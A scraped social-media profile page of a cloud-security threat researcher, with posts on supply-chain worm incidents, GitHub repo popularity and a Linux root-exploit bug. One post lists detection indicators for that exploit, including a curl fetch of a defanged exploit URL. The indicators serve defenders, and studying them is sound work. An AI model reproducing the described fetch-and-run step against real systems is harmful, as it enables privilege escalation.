Olivia
Online
Shay Berkovich
@sshaybbc
Threat Research at WIZ
Israel
Joined March 2016
221 Following
169 Followers
125 Posts
@ramimacisabird Love the presentation, its crucial to catch the link between the waves.
🫂"hugs from TeamPCP."
We're now 47 days and three rounds deep into the Checkmarx incident -- and this time TeamPCP left a message for victims in `~/hugs_from_teamPCP.txt`
Things appear mitigated, but waiting to see if rotation was a bit more atomic this time 🤞
List of most popular/active public repos on GitHub - April edition:
- @openclaw hype is over?
- @Microsoft GenAI tutorials are back to the first place
- April normalized to AI models and established learning
resources
Preliminary exploit detections for Copy Fail (CVE-2026-31431) based on our tests (these work best in combination):
1. "NET: Registered PF_ALG protocol family" in kern.log & syslog
2. curl for "copy[.]fail/exp" (if attacker is lazy)
3. su record without invoking user in auth.log
Who to follow
Stephen Demjanenko
@sdemjanenko
Builder, Climate same denier, Calling people on their hypocrisy and self-serving statements | ex Permiso, Meraki
Ronen Shustin 
@ronenshh
Vulnerability Research at @wiz_io
Itamar Gilad
@TrustingTrust
Threat Detection Lead, @wiz_io (acquired by @google).
Opinions are my own and do not represent my employer.
Did somebody manage to use it as a container escape from a non-priv container?
Patch your Linux boxes!
https://t.co/VWOUDbLAn2 is a trivially exploitable logic bug in Linux, reachable on all major distros released in the last 9 years. A small, portable python script gets root on all platforms.
Found by the teams at @theori_io and @xint_official
More details below
https://t.co/9f6T96PvPX
Fork commits keep showing up in supply chain attacks (tj-actions, reviewdog, TeamPCP).
But, I keep seeing incorrect explanations in incident threads/blogs
So I built a microsite to cut through the confusion
🔗in🧵
Another interesting point - the first non-AI repo is only 6th place.
Monthly list of most popular/active public repos on GitHub:
- @openclaw keeps the first place (although its half pace comparing to February)
- Rise of the personal claude skills and harnesses over official anthropics/skills
- karpathy/autoresearch - fast-breaker
Turns out # of forks is a great metric of repo popularity. Here is the most popular/forked repos of Feb 2026. Of course, #OpenClaw is leading the pack:
@blackroomsec Any feedback is welcome, please DM or slack! Planning additional updates meanwhile.
@GrahamHelton3 This is great research @GrahamHelton3 . Couldn't find it in the blog - is the command execution possible with node/proxy:list or node/proxy:watch?
UPDATE: Shai-Hulud 2.0 has a long tail, and it may have led to $7M in crypto theft.
Earlier today, our update laid out how sha1-hulud may have caused the Trust Wallet incident.
Trust Wallet just announced the same conclusion 📷Read our analysis >> https://t.co/nYIaOcueNB
Or extend their PAT revocation API to cover other token types: https://t.co/vvumboBkok
With #shaihulud2 refuses to die with the long tale of infections (117 new compromised machines in the last 72 hours, most of them form @Cursor IDE), all @github has to do is disable the gho_ tokens of the super-spreaders (last 2 active spreaders are Cpreet and moh-abed).
🪱sharing more on sha1-hulud w/@sshaybbc
* 2 packages == ~60% of infections
* 400k unique secrets in truffleSecrets.jsons, only 2.5% verified, & the majority of those short lived JWTs for GitHub Actions!
* 3/4 of impacted workloads were CI/CD, 1/4 were users
🔗below
Second part of our research on secret leaks In AI.
🤖 65% of Forbes AI 50 companies leaked secrets on GitHub. @sshaybbc revealed how AI speed without security = leaks waiting to happen.
Full Wiz Research report 👉
https://t.co/kmamDrkIo3
@brankopetric00 I would advise to go with EKS pod identity rather than IRSA.
@adnanthekhan At the end we need an attribution to stop this crazy attack sequence, I'd love to see more publications around the actor behaviour and to see GH doing more.
@adnanthekhan No cloud impact so far, but the abuse of the cloud access is an incremental evolution step that this actor seems to demonstrate with every attack. Given the likely pool of cloud creds they have now I won't be surprised...
Last Seen Users on Sotwe
BBC_PAPUA
Seen from Indonesia
kky
Seen from United States
مبادل الرياض 17
Seen from United States
Sleeping Incest
Seen from Indonesia
Adult Korean
Seen from Turkey
Baron Coleman
Seen from Canada
𝑬𝒍 𝑪𝒂𝒓𝒊𝒏
Seen from India
哼哼大王
Seen from France
Jose el chapin
Seen from Guatemala
Kang Ujang
Seen from Indonesia
Most Popular Users
Elon Musk
@elonmusk
240.1M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.9M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.8M followers
Taylor Swift
@taylorswift13
80.6M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.4M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.5M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.1M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
59.9M followers